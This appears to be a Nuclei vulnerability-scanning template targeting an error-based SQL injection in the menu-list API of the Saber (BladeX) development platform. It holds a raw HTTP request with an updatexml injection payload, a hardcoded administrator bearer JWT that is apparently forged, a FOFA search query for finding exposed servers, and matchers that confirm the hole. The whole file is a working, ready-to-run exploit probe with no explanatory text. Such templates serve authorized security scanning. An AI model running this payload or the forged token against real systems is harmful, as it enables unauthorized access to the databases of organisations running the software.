id: saber-menu-list-sqli
info:
  name: Saber(BladeX)企业级开发平台-menu-list-SQL
  author: leadlife
  severity: high
  description: 
  reference: 
    - demo
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: title="Saber企业级开发平台" || body="<strong>很抱歉，如果没有 JavaScript 支持，Saber 将不能正常工作"
  tags: saber,sqli

http:
  - raw:
      - |
        GET /api/blade-system/menu/menu-list?updatexml(1,concat(0x5c,md5(12345),0x5c),1)=1 HTTP/1.1
        Host: {{Hostname}}
        Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
      
    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - contains_all(body,'827ccb0eea8a706c4c34a16891f84e7')
        condition: and
